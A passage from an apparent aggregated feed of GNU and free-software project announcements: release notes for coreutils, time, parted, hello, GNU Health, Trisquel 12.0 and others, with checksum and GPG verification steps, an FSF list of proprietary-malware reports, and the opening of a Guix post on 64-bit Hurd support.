classes 'greeter', 'lock-screen', 'background', 'background-light',
and 'none' to be users.
[bug introduced in coreutils-9.4]

'pwd' on ancient systems will no longer overflow a buffer
when operating in deep paths longer than twice the system PATH_MAX.
[bug introduced in coreutils-9.6]

'stat --printf=%%N' no longer performs unnecessary checks of the QUOTING_STYLE
environment variable.
[bug introduced in coreutils-8.26]

'timeout' no longer exits abruptly when its parent is the init process, e.g.,
when started by the entrypoint of a container.
[bug introduced in coreutils-9.10]

** New Features

'cut' now supports multi-byte input and delimiters. Consequently
the -c option is now honored, and no longer an alias for -b, and
the -n option is now honored, and no longer ignored.
Also the -d option supports multi-byte delimiters.

'cut' adds new options for better compatibility:
The -w,--whitespace-delimited option was added to support blank aligned fields
and for better compatibility with FreeBSD/macOS.
The -O option was added as an alias for the --output-delimiter option,
for better compatibility with busybox/toybox.
The -F option was added as an alias for -w -O ' '
for better compatibility with busybox/toybox.

'date --date' now parses dot delimited dd.mm.yy format common in Europe.
This is in addition to the already supported mm/dd/yy and yy-mm-dd formats.

** Changes in behavior

'cksum --check' now uses shell quoting when required, to more robustly
escape file names output in diagnostics.
This also affects md5sum, sha*sum, and b2sum.

** Improvements

'cat' now uses zero-copy I/O on Linux when appropriate, to improve throughput.
E.g., throughput improved 6x from 12.9GiB/s to 81.8GiB/s on a Power10 system.

'df --local' recognises more file system types as remote.
Specifically: autofs, ncpfs, smb, smb2, gfs, gfs2, userlandfs.

'df' improves duplicate mount suppression, by checking each mount against
all previously kept entries for the same device, not just the latest one.

'expand' and 'unexpand' now support multi-byte characters.

'groups' and 'id' will now exit sooner after a write error,
which is significant when listing information for many users.

'install' now allows the combination of the --compare and
--preserve-timestamps options.

'fold', 'join', 'numfmt', 'uniq' now use more consistent blank character
determination on non GLIBC platforms. For example \u3000 (ideographic space)
will be considered a blank character on all platforms.

'nl' now supports multi-byte --section-delimiter characters.

'shuf -i' now operates up to two times faster on systems with unlocked stdio
functions.

'tac' will now exit sooner after a write error, which is significant when
operating on a file with many lines.

'timeout' now properly detects when it is reparented by a subreaper process on
Linux instead of init, e.g., the 'systemd --user' process.

'wc -l' now operates up to four and a half times faster on hosts that support
Neon instructions.

'wc -m' now operates up to 2.6 times faster on GLIBC when processing
non-ASCII UTF-8 characters.

'yes' now uses zero-copy I/O on Linux to significantly increase throughput.
E.g., throughput improved 15x from 11.6GiB/s to 175GiB/s on a Power10 system.

** Build-related

./configure --enable-single-binary=hardlinks is now supported on systems
with dash as the system shell at /bin/sh.
[issue introduced in coreutils-9.10]

The test suite may have failed with a "Hangup" error if run non-interactively.
[issue introduced in coreutils-9.10]

health @ Savannah: GNU Health GTK client 5.0.2 released

Mon, 20 Apr 2026 08:03:25 +0000

Dear community

The GTK client 5.0.2 of the GNU Health Hospital and Health Management system has been released!

This is a maintenance patchset that fixes the following issues:

Unknown icon error when registering gnu health local icons
Swapped Export - import icons
Update connection port number in README file
GNU Health GTK client does not automatically discover plugins from gnuhealth_plugins

You can get the latest GNU Health client from GNU.org, Python Package Index or Codeberg.

Happy hacking!

GNU Taler news: Taler lecture at Cedarcrypt 2026

Sat, 18 Apr 2026 13:49:06 +0000

by Özgür Kesim

health @ Savannah: Thalamus 0.9.18 released

Fri, 17 Apr 2026 11:30:43 +0000

Dear GNU Health community

We are happy to announce the release of Thalamus 0.9.18. Thalamus is the message and authentication server of the GNU Health Federation.

In this release, we have migrated to Poetry packaging system and updated the documentation (https://docs.gnuh ... alth.org/thalamus)

You can get Thalamus from GNU.org and the Python Package Index, PyPi

Happy hacking!
Luis

FSF Blogs: You cannot use the GNU (A)GPL to take software freedom away

Wed, 15 Apr 2026 16:05:00 +0000

Protecting the integrity of the (A)GPL is an essential component in protecting user freedom.

time @ Savannah: time-1.10 released [stable]

Wed, 15 Apr 2026 04:34:19 +0000

This is to announce time-1.10, a stable release.

The 'time' command runs another program, then displays information about
the resources used by that program.

There have been 79 commits by 5 people in the 422 weeks since 1.9.

See the NEWS below for a brief summary.

Thanks to everyone who has contributed!
The following people contributed changes to this release:

Andreas Schwab (1)
Assaf Gordon (10)
Collin Funk (65)
Dominique Martinet (1)
Petr Písař (2)

Collin
[on behalf of the time maintainers]
==================================================================

Here is the GNU time home page:
    https://gnu.org/s/time/

Here are the compressed sources:
https://ftp.gnu.org/gnu/time/time-1.10.tar.gz   (832KB)
https://ftp.gnu.org/gnu/time/time-1.10.tar.xz   (572KB)

Here are the GPG detached signatures:
https://ftp.gnu.org/gnu/time/time-1.10.tar.gz.sig
https://ftp.gnu.org/gnu/time/time-1.10.tar.xz.sig

Use a mirror for higher download bandwidth:
https://www.gnu.org/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

SHA256 (time-1.10.tar.gz) = 6MKftKtZnYR45B6GGPUNuK7enJCvJ9DS7yiuUNXeCcM=
SHA3-256 (time-1.10.tar.gz) = zDjyfyzfABsSZp7lwXeYr368VzjZMkNPUJNnfpIakGk=
SHA256 (time-1.10.tar.xz) = cGv3uERMqeuQN+ntoY4dDrfCMnrn2MLOOkgjxfgMexE=
SHA3-256 (time-1.10.tar.xz) = U/Z0kMenoHkc7+rkCHMeyku8nXvIPppoQ2jq3B50e/A=

Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.

Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:

gpg --verify time-1.10.tar.gz.sig

The signature should match the fingerprint of the following key:

pub   rsa4096/8CE6491AE30D7D75 2024-03-11 [SC]
        Key fingerprint = 2371 1855 08D1 317B D578 E5CC 8CE6 491A E30D 7D75
uid                 [ultimate] Collin Funk <collin.funk1@gmail.com>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key collin.funk1@gmail.com

gpg --recv-keys 8CE6491AE30D7D75

wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=time&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify time-1.10.tar.gz.sig

This release is based on the time git repository, available as

git clone https://https.git.savannah.gnu.org/git/time.git

with commit 40003f3c8c4ad129fbc9ea0751c651509ac5bb23 tagged as v1.10.

For a summary of changes and contributors, see:

https://gitweb.git.savannah.gnu.org/gitweb/?p=time.git;a=shortlog;h=v1.10

or run this command from a git-cloned time directory:

git shortlog v1.9..v1.10

This release was bootstrapped with the following tools:
Autoconf 2.73
Automake 1.18.1
Gnulib 2026-04-13 c754c51f0f2b9a1e22d0d3eadfefff241de0ea48

NEWS

* Noteworthy changes in release 1.10 (2026-04-14) [stable]

** Bug fixes

'time --help' no longer incorrectly lists the short option -h as being
supported. Previously it was listed as being equivalent to --help.
[bug introduced in time-1.8]

'time --help' no longer emits duplicate percent signs in the description of
the --portability option.
[bug introduced in time-1.8]

time now opens the file specified by --output with its close-on-exec flag set.
Previously the file descriptor would be leaked into the child process.
[This bug was present in "the beginning".]

time no longer appends the program name to the output when the format string
contains a trailing backslash.
[This bug was present in "the beginning".]

** Improvements

time now uses the more portable waitpid and getrusage system calls
instead of wait3.

time can now be built using a C23 compiler.

time now uses unlocked stdio functions on platforms that provide them.

health @ Savannah: GNU Health HIS server 5.0.7 patchset bundle released

Sat, 11 Apr 2026 21:12:18 +0000

Dear community

I'm happy to announce the release of the patchset v5.0.7 of the GNU Health Information Management System.

This maintenance version fixes issues in the crypto subsystem related to the laboratory results validation process; delivers automated testing for the packages and updates pyproject.toml to the latest PEP639 specs.

Main issues fixed & tasks related to this patchset:

health_crypto_lab: Wrong display of the validation button and 403 error (https://codeberg. ... th/his/issues/177)

Update woodpecker CI and packages automated tests (thanks, Cedric!). (https://codeberg. ... 5c11eda152df82dbf)

Update pyproject.toml to PEP639 project.license current specification (https://codeberg. ... th/his/issues/178)

For more details visit our development area at Codeberg.

Happy hacking!
Luis

Trisquel GNU/Linux: Trisquel 12.0 "Ecne" release announcement

Sat, 11 Apr 2026 19:01:35 +0000

We are proud to announce the release of Trisquel 12.0 Ecne! After extensive work and thorough testing, Ecne is ready for production use. This release builds on the foundation of Aramo with meaningful improvements across packaging, the kernel, security, and software availability.

Major milestones

APT 3.0 and full deb822 repository format. Trisquel 12.0 ships with APT 3.0, enabling us to fully adopt the modern deb822 repository format across all installation paths. The netinstall (for text-based installation and advanced users), Ubiquity (for graphical installation from a live system), as well as Synaptic and other package-management tools have been updated to use the new repository formats.

Improved kernel modularity, and system security. The kernel remains one of our biggest engineering challenges with every release. For Ecne, we focused on making our kernel changes more modular, substantially reducing breakage in the udeb components used during installation. Work on updating kernel-wedge is ongoing and we are well positioned to complete it. We revised many AppArmor rules for graphical environments, improving security coverage for everyday desktop use.

New browser options. Both GNU IceCat and ungoogled-chromium are now available in Ecne, joining our continuously maintained Abrowser, giving users a range of fully free web browsing choices.

Backports. Our backports repository continues to provide popular applications in their latest versions, including LibreOffice, yt-dlp, Inkscape, Nextcloud Desktop, Kdenlive, Tuba, 0 A.D., fastfetch, and more.

Ecne is based on Ubuntu 24.04 LTS and will receive support until 2029. Users of Trisquel 11.x Aramo can upgrade directly using the update-manager or do-release-upgrade commands at a console terminal.

Editions

Trisquel. MATE (v1.26.1) continues to be our default desktop environment. Simple, with great accessibility, and low hardware requirements (no 3D acceleration needed).
Triskel. Our KDE (v5.27) edition is excellent for customizing the design and functionality in fine detail.
Trisquel Mini. Running LXDE (v0.99.2), the Mini edition is a lightweight desktop perfect for netbooks, old computers and users with minimal resource usage needs.
Trisquel Sugar or Trisquel On A Sugar Toast (TOAST): Based on the Sugar learning platform (v0.121), TOAST comes with dozens of educational activities for children.
Network installer image: To deploy with a command-line install interface, it is ideal for servers and advanced users who want to explore custom designed environments.

Looking ahead

Work on the next release will start immediately, and initial groundwork for RISC-V architecture support has already begun; an exciting new challenge as the free hardware design ecosystem continues to grow.

Trisquel is a non-profit project; you can help sustain it by becoming a member, donating, or buying from our store. Thank you to all our donors, and to the contributors who made Ecne possible through code, patches, bug reports, translations, and advice. Special thanks to Luis "Ark74" Guzmán, prospero, icarolongo, Avron, knife, Simon Josefsson, Christopher Waid (ThinkPenguin), Denis "GNUtoo" Carikli, and the wonderful community that keeps the project alive and free.

parted @ Savannah: parted-3.7 released [stable]

Wed, 08 Apr 2026 22:57:07 +0000

I have released parted 3.7

Here are the compressed sources and a GPG detached signature[*]:
https://ftp.gnu.o ... parted-3.7.tar.xz
https://ftp.gnu.o ... ed-3.7.tar.xz.sig

Use a mirror for higher download bandwidth:
https://www.gnu ... g/prep/ftp.html

Here are the SHA256 checksums:

008de57561a4f3c25a0648e66ed11e7b30be493889b64334a6d70f2c1951ef7b parted-3.7.tar.xz
de51773eef47a10db34ff2462f3b3c9d987d4bdb49420f0a22e1dda1ff897a5c parted-3.7.tar.xz.sig

[*] Use a .sig file to verify that the corresponding file (without the .sig
suffix) is intact. First, be sure to download both the .sig file and the
corresponding tarball. Then, run a command like this:

gpg --verify parted-3.7.tar.xz.sig

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to update
or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key bcl@redhat.com

gpg --recv-keys 117E8C168EFE3A7F

wget -q -O- 'https://savannah. ... ed&download=1' | gpg --import -

This release was bootstrapped with the following tools:
Autoconf 2.72
Automake 1.17
Gettext 0.23.1
Gnulib commit 4e11e3d07a79a49eaa9b155c43801bbc1e5bd86e
Gperf 3.1

NEWS

Noteworthy changes in release 3.7 (2026-04-08) [stable]

Promoting alpha release to stable release 3.7

Noteworthy changes in release 3.6.37 (2026-03-24) [alpha]

** New Features

   hurd: Support USB device names

** Bug Fixes

   Stop adding boot code into the MBR if it's zero when updating an
   existing msdos partition table.

   disk.c: Update metadata after reading partition table

   Fix initialization of atr_c_locale inside PED_ASSERT

   nilfs2: Fixed possible sigsegv in case of corrupted superblock

   libparted: Do not detect ext4 without journal as ext2

   libparted: Fix dvh disklabel unhandled exception

   libparted: Fix sun disklabel unhandled exception

   parted: fix do_version declaration to work with gcc 15

   libparted: Fail early when detecting nilfs2

   doc: Document IEC unit behavior in the manpage

   parted: Print the Fixing... message to stderr

   docs: Finish setup of libparted API docs

   libparted: link libparted-fs-resize.so to libuuid

health @ Savannah: GNU Health control center 5.0.3 released

Wed, 08 Apr 2026 10:36:51 +0000

Dear community

I'm happy to announce the release of the gnuhealth-control version 5.0.3

This version fixes some dependency issues in the context of the the initial HIS instance creation.

For more information about the GNU Health Control center, visit our documentation page at:

https://docs.gnuh ... ontrolcenter.html

Issues related to this release:

https://codeberg. ... is-utils/issues/9

GNU Taler news: TalerBarr is now available to everyone

Mon, 06 Apr 2026 22:00:00 +0000

by Bohdan Potuzhnyi

Parabola GNU/Linux-libre: iptables-legacy

Mon, 06 Apr 2026 14:41:11 +0000

From Arch:

The old iptables-nft package name is replaced by iptables, and the legacy backend is available as iptables-legacy.

When switching packages (among iptables-nft, iptables, iptables-legacy), check for .pacsave files in /etc/iptables/ and restore your rules if needed:

/etc/iptables/iptables.rules.pacsave
/etc/iptables/ip6tables.rules.pacsave

Most setups should work unchanged, but users relying on uncommon xtables extensions or legacy-only behavior should test carefully and use iptables-legacy if required.

www @ Savannah: Malware in Proprietary Software - Latest Additions

Thu, 02 Apr 2026 16:25:53 +0000

Here are our latest additions

March 2026

Proprietary Interference

Shake Shack requires users of its mobile app to sign away their right to sue the company if they order their meals from their phones.

Potential Malware

Meta has been granted a patent to use so-called “Artificial Intelligence” to impersonate human users in social media platforms, for example people who are inactive or dead. To cover itself from predictable controversies, Meta declared that it does not intend to use the technology in the context of those examples. How long before the “invention” is used to impersonate active, living people?

February 2026

HP's Software is Malware

HP has recently started pushing a spyware program called HPMediaNetwork.exe into users' computers exploiting a Windows universal back door via Windows Update. The software, which is designed to serve personalized pop-up advertisements on the user's screen, runs in the background to collect device and users' data that HP sells to advertising companies. The malfeature is implemented at both hardware and software levels, and opting out does not block ads entirely.

Users can avoid this and other kinds of mistreatment by choosing hardware that comes with free specifications and designs, and by installing only free software in their computers.

Microsoft's Software is Malware

Microsoft is pushing Pretend Intelligence onto users of Windows, set up to be able to take real world actions on the user's behalf. This starts with a subset of enthusiasts but the company is probably planning to push it onto everyone.

Since Windows 11, like several previous versions, has a universal back door enabling Microsoft to remotely change the system code, any limits the user specifies for what Microsoft can do to per (the user) are no more than requests. If you don't want to be messed with, you should not run Windows. Nonetheless, Microsoft might heed those requests.

Warning: this article seems to ridicule the idea that users might use a feature to limit what the PI has access to on their own machines.

Windows encrypts disks for “security,” but reports all the encryption keys to Microsoft so that the encryption doesn't provide real security. Once Microsoft has these keys, it can't refuse to give them to the FBI. However, for real security you need to be able to use your own choice of keys. Microsoft stops users from doing that.

Malware in Mobile Devices

OnePlus 13 and 15 smartphones shipping with ColorOS versions 16.0.3.500/.501/.503 implement an anti-rollback feature which physically renders the device unusable if the owner tries to modify the operating system running in it.

At the time of writing the restriction affects only those two models and only ColorOS, but it is expected that the company may extend it to older models of the phone as well as to OxygenOS, the variant of the operating system installed on phones intended for the global market.

January 2026

Google's Software is Malware

Google has rolled out a new software app which allows employers to log all messages sent through the Rich Communication Services (a newer replacement for SMS messages) on company-owned phones provided to employees, amplifying the surveillance workers are subjected to.

“Bossware” as it's called, explicitly requires nullifying user agency in favor of a third-party (the boss), and therefore requires proprietary software.

Microsoft's Software is Malware

Microsoft has, repeatedly, pushed software changes meant to make it harder for users to use a web browser different than Microsoft's.

December 2025

Malware In Cars

The software installed in electric buses manufactured by Yutong in China and exported to some European countries contains a back door that enables the company to remotely control and even deactivate the vehicles.

November 2025

Proprietary Back Doors

Universe Browser, tied to online gambling platforms in Asia and marketed as a “privacy browser,” installs various malicious functionalities in the user's computer.

Proprietary Censorship

Bowing down to the US government, Apple and Google removed from their stores several applications used for reporting ICE raids. Google even tried to justify it by calling ICE thugs a “vulnerable group,” despite them being the ones who carry the weapons.

Proprietary Surveillance

An app called ICEBlock tried to set up anonymous posting and anonymous access to data about where US deportation thugs are operating. It didn't keep records about who was using it—but Apple's own records would be enough to make them vulnerable to snooping by the US government to find who uses the app.

Apple later removed ICEBlock from its store at the request of the US government.

parallel @ Savannah: GNU Parallel 20260322 ('این آخرین نبرده،') released [stable]

Sun, 29 Mar 2026 17:48:42 +0000

GNU Parallel 20260322 ('این آخرین نبرده،') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

i rly love gnu parallel over xargs, it's basically the same but has lots of useful and well documented options. sry if u know already
-- d@nny "disc@" mc² @hipsterelectron@circumstances.run

New in this release:

No new features.
Bug fixes.

About GNU Parallel

Give a demo at your local user group/team/colleagues
Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
Get the merchandise https://gnuparall ... igns/gnu-parallel
Request or write a review for your favourite blog or magazine
Request or build a package for your favourite distribution (if it is not already there)
Invite me for your next conference

If you use programs that use GNU Parallel for research:

Please cite GNU Parallel in you publications (use --citation)

If GNU Parallel saves you money:

(Have your company) donate to FSF https://my.f ... .org/donate/

About GNU SQL

About GNU Niceload

remotecontrol @ Savannah: GE SmartHQ™ Management

Thu, 26 Mar 2026 11:12:52 +0000

https://www.smart ... com/lp/management

This offering sure looks like GNU remotecontrol. Perhaps it is our code.

GNU Taler news: GNU Taler 1.5 released

Fri, 20 Mar 2026 23:00:00 +0000

We are happy to announce the release of GNU Taler v1.5.

autoconf @ Savannah: Autoconf 2.73 released

Fri, 20 Mar 2026 20:00:39 +0000

Autoconf 2.72 has been released, see the release announcement:

https://lists.gnu ... -03/msg00000.html

libredwg @ Savannah: libredwg-0.13.4 released

Thu, 19 Mar 2026 06:32:07 +0000

A major bugfix release. Complete rewrite of the decompressor to
fix hairy section reading bugs in some big files. Fixed many dxf roundtrips.
See https://www.gnu.o ... oftware/libredwg/ and https://github.co ... /blob/0.13.4/NEWS

Here are the compressed sources:
http://ftp.gnu.or ... dwg-0.13.4.tar.gz (21MB)
http://ftp.gnu.or ... dwg-0.13.4.tar.xz (11MB)

Here are the GPG detached signatures[*]:
http://ftp.gnu.or ... 0.13.4.tar.gz.sig
http://ftp.gnu.or ... 0.13.4.tar.xz.sig

Use a mirror for higher download bandwidth:
https://www.gnu.o ... rg/order/ftp.html

Here are more binaries:
https://github.co ... leases/tag/0.13.4

Here are the SHA256 checksums:

cacff5510f46723462e854e15ecfa97cbc7475acb3eb7ae1ca6e4193ecc2267d libredwg-0.13.4.tar.gz
7e153ea4dac4cbf3dc9c50b9ef7a5604e09cdd4c5520bcf8017877bbe1422cd5 libredwg-0.13.4.tar.xz
cb46bce034296e91cb1a982cd53ec1928b11f4f7f70512dd21513a27959688b5 libredwg-0.13.4-win64.zip

Please ignore the broken Source code (tar.gz, .zip) artefacts. They cannot be deleted.

[*] Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:

gpg --verify libredwg-0.13.4.tar.gz.sig

If that command fails because you don't have the required public key,
then run this command to import it:

gpg --recv-keys B4F63339E65D6414

and rerun the gpg --verify command.

GNUnet News: GNUnet 0.27.0

Wed, 18 Mar 2026 23:00:00 +0000

GNUnet 0.27.0 released

We are pleased to announce the release of GNUnet 0.27.0.
GNUnet is an alternative network stack for building secure, decentralized and privacy-preserving distributed applications. Our goal is to replace the old insecure Internet protocol stack. Starting from an application for secure publication of files, it has grown to include all kinds of basic protocol components and applications towards the creation of a GNU internet.

This is a new major release. Major versions may break protocol compatibility with the 0.26.X versions. Please be aware that Git master is thus henceforth (and has been for a while) INCOMPATIBLE with the 0.26.X GNUnet network, and interactions between old and new peers will result in issues. In terms of usability, users should be aware that there are still a number of known open issues in particular with respect to ease of use, but also some critical privacy issues especially for mobile users. Also, the nascent network is tiny and thus unlikely to provide good anonymity or extensive amounts of interesting information. As a result, the 0.27.0 release is still only suitable for early adopters with some reasonable pain tolerance .

Download links

gnunet-0.27.0.tar.gz ( signature )
gnunet-fuse-0.27.0.tar.gz ( signature )

The GPG key used to sign is: 3D11063C10F98D14BD24D1470B0998EF86F59B6A

Note that due to mirror synchronization, not all links might be functional early after the release. For direct access try http://ftp.gnu.org/gnu/gnunet/

Changes

A detailed list of changes can be found in the git log, the NEWS.

Known Issues

There are known major issues with the TRANSPORT subsystem.
There are known moderate implementation limitations in CADET that negatively impact performance.
There are known moderate design issues in FS that also impact usability and performance.
There are minor implementation limitations in SET that create unnecessary attack surface for availability.
The RPS subsystem remains experimental.

In addition to this list, you may also want to consult our bug tracker at bugs.gnunet.org which lists about 190 more specific issues.

Thanks

This release was the work of many people. The following people contributed code and were thus easily identified: Christian Grothoff, Florian Dold, TheJackiMonster, and Martin Schanzenbach.

hello @ Savannah: hello-2.12.3 released [stable]

Wed, 18 Mar 2026 03:46:16 +0000

This is to announce hello-2.12.3, a stable release.

GNU hello is a demonstration and model of the GNU coding standards for
hackers, and a simple example for users.

There have been 18 commits by 2 people in the 43 weeks since 2.12.2.

See the NEWS below for a brief summary.

Thanks to everyone who has contributed!
The following people contributed changes to this release:

Collin Funk (16)
Reuben Thomas (2)

Collin
[on behalf of the hello maintainers]
==================================================================

Here is the GNU hello home page:
    https://gnu.org/s/hello/

Here are the compressed sources and a GPG detached signature:
https://ftpmirror.gnu.org/hello/hello-2.12.3.tar.gz
https://ftpmirror.gnu.org/hello/hello-2.12.3.tar.gz.sig

Use a mirror for higher download bandwidth:
https://www.gnu.org/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

SHA256 (hello-2.12.3.tar.gz) = DV9gFUOC/uELEUocNOeF2LH0kgc64tOm97FHaHs2aqA=
SHA3-256 (hello-2.12.3.tar.gz) = VQz4Y71rvDa2iSh59ZUTHiT0wJmFWKo4VcUvpkRi4Ek=

Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.

Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:

gpg --verify hello-2.12.3.tar.gz.sig

The signature should match the fingerprint of the following key:

pub   rsa4096/8CE6491AE30D7D75 2024-03-11 [SC]
        Key fingerprint = 2371 1855 08D1 317B D578 E5CC 8CE6 491A E30D 7D75
uid                 [ultimate] Collin Funk <collin.funk1@gmail.com>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key collin.funk1@gmail.com

gpg --recv-keys 8CE6491AE30D7D75

wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=hello&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify hello-2.12.3.tar.gz.sig

This release is based on the hello git repository, available as

git clone https://https.git.savannah.gnu.org/git/hello.git

with commit 89fff19b23e35f0e97072507685c92aaae3d04c7 tagged as v2.12.3.

For a summary of changes and contributors, see:

https://gitweb.git.savannah.gnu.org/gitweb/?p=hello.git;a=shortlog;h=v2.12.3

or run this command from a git-cloned hello directory:

git shortlog v2.12.2..v2.12.3

This release was bootstrapped with the following tools:
Autoconf 2.72
Automake 1.18.1
Gnulib 2026-03-16 4e11e3d07a79a49eaa9b155c43801bbc1e5bd86e

NEWS

* Noteworthy changes in release 2.12.3 (2026-03-17) [stable]

The manual no longer mentions the -h and -v short options which were
removed in release 2.11.

Update gnulib for compatibility with glibc-2.43.

GNU hello no longer fails to build with BSD implementations of the
'make' command. Previously they would be unable to find a target
listed as a dependency of the 'hello' program.

texmacs @ Savannah: TeXmacs 2.1.5 released

Tue, 17 Mar 2026 13:14:54 +0000

Hello everyone,

We are pleased to announce the release of TeXmacs version 2.1.5

This version uses Qt6 by default, supports very high-definition displays, and introduces new ongoing collaborative editing features. On Windows, TeXmacs is now available on the Microsoft Store. On Linux, we have a new Qt6 AppImage that maximizes compatibility with GNU Linux distributions. On Mac, we have new universal packages.

- Download for Windows: https://www.texma ... d/windows.en.html
- Download for macOS: https://www.texma ... ad/macosx.en.html
- Download for GNU Linux: https://www.texma ... oad/linux.en.html

Happy writing with TeXmacs!

The TeXmacs Team

unifont @ Savannah: Unifont 17.0.04 Released

Fri, 13 Mar 2026 21:46:00 +0000

13 March 2026 Unifont 17.0.04 is now available. This is a minor release aligned with Unicode 17.0.0.

This release notably includes separate BDF, PCF, and OpenType font files with 28,000+ Unicode T-source Chinese glyphs created by Kusanagi_Sans and Kao Chen-tung (高振東) in font files beginning with "unifont_t". Many other Chinese glyphs have been added. Also, font/Makefile has been reorganized for more efficient font file building. See the ChangeLog file for details.

Download this release from GNU server mirrors at:

     https://ftpmirror ... /unifont-17.0.04/

or if that fails,

     https://ftp.gnu.o ... /unifont-17.0.04/

or, as a last resort,

     ftp://ftp.gnu.org ... /unifont-17.0.04/

These files are also available on the unifoundry.com website:

     https://unifoundr ... /unifont-17.0.04/

Font files are in the subdirectory

     https://unifoundr ... 0.04/font-builds/

A more detailed description of font changes is available at

      https://unifoundr ... nifont/index.html

and of utility program changes at

      https://unifoundr ... nt-utilities.html

Information about Hangul modifications is at

      https://unifoundr ... hangul/index.html

and

      http://unifoundry ... l-generation.html

Enjoy!

Paul Hardy
GNU Unifont Maintainer

FSF News: Job opportunity: Engineering and Certification Manager at the Free Software Foundation

Tue, 10 Mar 2026 12:15:00 +0000

The Free Software Foundation (FSF), a Massachusetts 501(c)(3) charity with a worldwide mission to promote computer user freedom, seeks a motivated and talented individual to be our new Engineering and Certification Manager. This position is ideally full-time and US-based, but exceptions can be made for a qualified candidate.

pspp @ Savannah: PSPP 2.1.1 has been released

Fri, 06 Mar 2026 16:48:40 +0000

I'm very pleased to announce the release of a new version of GNU PSPP. PSPP is a program for statistical analysis of sampled data. It is a free replacement for the proprietary program SPSS.

Changes from 2.1.0 to 2.1.1:

Translation updates.
Bug fixes in build system and tests.
No longer mistakenly labeled as a "test release".

Please send PSPP bug reports to bug-gnu-pspp@gnu.org.

pspp @ Savannah: PSPP 2.1.0 has been released.

Wed, 04 Mar 2026 18:24:39 +0000

Bug fixes.
Translation updates.

Please send PSPP bug reports to bug-gnu-pspp@gnu.org.

texinfo @ Savannah: Texinfo 7.3 released

Mon, 02 Mar 2026 18:54:59 +0000

We have released version 7.3 of Texinfo, the GNU documentation format.

It's available via a mirror (xz is much smaller than gz, but gz is available too just in case):

https://ftpmirror ... exinfo-7.3.tar.xz
https://ftpmirror ... exinfo-7.3.tar.gz

Please send any comments to bug-texinfo@gnu.org.

Full announcement:

https://lists.gnu ... -03/msg00007.html

GNU Guix: The 64-bit Hurd is Here!

Sun, 01 Mar 2026 10:00:00 +0000

Fifteen months have passed since our last Guix/Hurd on a Thinkpad X60 post and a lot has happened with respect to the Hurd.

And most of you will have guessed, unless you skipped the title of this post, the rumored x86_64 support has landed in Guix!

Here is a not-so-short overview of our Hurd work over the past 1.5 years:

The build daemon fails when invoking guix authenticate on the Hurd bug was fixed. This was our most pressing problem as it meant that we could not keep our substitutes up to date. It took 15 comments and 13 weeks to get it resolved. Phew!
Installer support for (cross)-installing the Hurd. Also adding developer support for running the installer directly from the source tree; Guix 1.5.0 lets you install the Hurd on bare metal.
Fix tests in the Shepherd.
Update hurd to 0.9.git20250420, gnumach to 1.8+git20250304.
Add support for a cross-built gnumach, allowing the removal of an ugly workaround when cross-building for the Hurd.
Update rumpkernel to 0-20250111.
Support for different childhurd types, a.k.a. 64-bit childhurds in da house.
The syslogd used by default is now from the Shepherd streamio, gnumach, and the Shepherd, to make the kernel log work.
Update hurd to 0.9.git20251029, gnumach: to 1.8+git20250731.
Now that the go-team branch has been merged, gccgo now works (native only).
Fix proc server for zombie processes which caused a shepherd test to fail.
Fix all the dependencies of the guix package, again:
- libgit2 tests,
- dbus, opensp, po4a,
Resurrect password hashing.
Installer: Fixes for the Hurd.
Installer: More clearly mark the Hurd as experimental.
Installer: Add Hurd x86_64 as an option. This took 15 comments, uncovering and fixing several bugs.
Add support for x86_64-gnu, aka the 64-bit Hurd. The initial patch set consisted of 31 patches. This patch set took four iterations and 208 messages before its final 58 patches were merged to `core-packages-team'. Janneke writes: "Lo and behold, the 64-bit Hurd boots! Again, thanks to the help from the kind folks over at libera #hurd and their excellent work. Do something like:"

./pre-inst-env guix system image --image-type=hurd64-qcow2 \
  gnu/system/examples/bare-hurd64.tmpl

Pushed a `core-packages-team' with (this one) GCC 14 commit.  Let the
fun begin :)

We had a lot of fun...

Request for merging "core-packages-team" branch: 247 commits, took 114 comments 8 weeks and 24 iterations with 247 commits from 9 people before presenting the initial merge.
The actual merge "core-packages-team": 85 more commits to a total of 332, by 17 people and 27 weeks before actual merge. 173 packages with build fixes to relax GCC 14's strictness, 109 package updates to fix build with GCC 14.
With this all in place we can have ci build a 64-bit hurd image, and
Report what packages still need to be fixed for that image to build.
For convenience we added i586-pc-gnu and x86_64-pc-gnu cross toolchains.

Summarizing, building the Guix manifest for the 32-bit Hurd (i586-gnu) should work really well. Sadly, for the 64-bit Hurd (x86_64-gnu) is still a bit problematic as some tests in e.g., openssl, python, cmake, .... hang. This is still under investigation.

What Took You So Long?

We're so glad you asked! Usually, adding a new architecture should just take a couple of commits:

pretty neat, right? So, what's the story with the 64-bit Hurd? There are two problems: 64-bit Hurd support was added in GCC 14, while Guix was still at GCC 11. This means we "only" had to

